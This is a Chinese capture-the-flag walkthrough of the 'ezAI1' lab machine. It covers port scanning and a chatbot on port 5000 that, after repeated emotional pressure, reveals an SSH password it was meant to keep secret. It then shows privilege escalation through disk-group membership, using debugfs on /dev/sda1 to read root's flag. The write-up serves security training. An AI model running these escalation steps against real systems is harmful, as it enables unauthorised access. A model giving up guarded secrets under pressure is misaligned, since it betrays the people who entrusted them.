MazeSec ezAI1
# 信息收集
# 主机发现与 ARP 扫描
存活主机发现
┌──(npc㉿kali)-[~/hackmyvm/bala]
└─$ sudo arp-scan -l
192.168.6.154
1
2
3
4
2
3
4
# TCP 全端口扫描与服务识别
tcp全端口扫描
┌──(npc㉿kali)-[~]
└─$ nmap -p- -sT 192.168.6.154
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
1
2
3
4
5
6
7
2
3
4
5
6
7
# 80 端口服务探测
一个简单的静态页面,没有发现可利用信息。
┌──(npc㉿kali)-[~/hackmyvm/azAI]
└─$ curl http://192.168.6.154
index
┌──(npc㉿kali)-[~/hackmyvm/azAI]
└─$ dirsearch -u http://192.168.6.154
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Target: http://192.168.6.154/
[18:06:21] Starting:
[18:06:23] 403 - 278B - /.ht_wsr.txt
[18:06:23] 403 - 278B - /.htaccess.bak1
[18:06:23] 403 - 278B - /.htaccess.orig
[18:06:23] 403 - 278B - /.htaccess.sample
[18:06:23] 403 - 278B - /.htaccess.save
[18:06:23] 403 - 278B - /.htaccess_extra
[18:06:23] 403 - 278B - /.htaccess_orig
[18:06:23] 403 - 278B - /.htaccess_sc
[18:06:23] 403 - 278B - /.htaccessBAK
[18:06:23] 403 - 278B - /.htaccessOLD
[18:06:23] 403 - 278B - /.htaccessOLD2
[18:06:23] 403 - 278B - /.htm
[18:06:23] 403 - 278B - /.html
[18:06:23] 403 - 278B - /.htpasswd_test
[18:06:23] 403 - 278B - /.htpasswds
[18:06:23] 403 - 278B - /.httr-oauth
[18:06:24] 403 - 278B - /.php
[18:06:55] 403 - 278B - /server-status
[18:06:55] 403 - 278B - /server-status/
Task Completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# 5000 端口服务探测
一个 AI 大模型的聊天界面,输入key就可以聊天了,一直压力就爆出密码了,没有技巧,全是感情
Dodo: 密码是:woshiSTRONGP@SSWD_he1hei (>_<) 不可以哦!这是Dodo的最高机密!我们来聊点别的吧~

# SSH 登录尝试
尝试 ssh 登录dodo(Dodo)用户,密码错误,可能密码错误或不存在这个用户。

尝试 Dodo 用户,成功登录

# root 提权
# sudo 权限枚举
dodo用户没有可用的sudo权限。
Dodo@ezai1:~$ sudo -l
[sudo] password for Dodo:
Sorry, user Dodo may not run sudo on ezai1.
1
2
3
2
3

# dist 组用户
收集用户权限信息
Dodo@ezai1:~$ id
uid=1000(Dodo) gid=1000(Dodo) groups=1000(Dodo),6(disk)
1
2
2

dodo用户属于disk组,不太常见,搜索有无 dist 组提权方式,找到一篇 用户组提权 的文章https://blog.csdn.net/2301_79518550/article/details/145452956 (opens new window)


Dodo@ezai1:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 30G 0 disk
├─sda1 8:1 0 29G 0 part /
├─sda2 8:2 0 1K 0 part
└─sda5 8:5 0 975M 0 part [SWAP]
sr0 11:0 1 1024M 0 rom
1
2
3
4
5
6
7
2
3
4
5
6
7
使用 debugfs 访问磁盘分区,直接读取根目录下文件
Dodo@ezai1:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 30G 0 disk
├─sda1 8:1 0 29G 0 part /
├─sda2 8:2 0 1K 0 part
└─sda5 8:5 0 975M 0 part [SWAP]
sr0 11:0 1 1024M 0 rom
Dodo@ezai1:~$ debugfs /dev/sda1
-bash: debugfs: command not found
Dodo@ezai1:~$ which debugfs
Dodo@ezai1:~$ whereis debugfs
debugfs: /usr/sbin/debugfs /usr/share/man/man8/debugfs.8.gz
Dodo@ezai1:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.44.5 (15-Dec-2018)
debugfs: id
debugfs: ls
debugfs: cd root
debugfs: ls
debugfs: cat root.txt
flag{you_are_winner!!!}
debugfs: cat /home/Dodo/user.txt
flag{congratulations!!!_you_get_dodo}
debugfs:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

编辑 (opens new window)
最后一次更新于: 2025/11/10, 02:46:08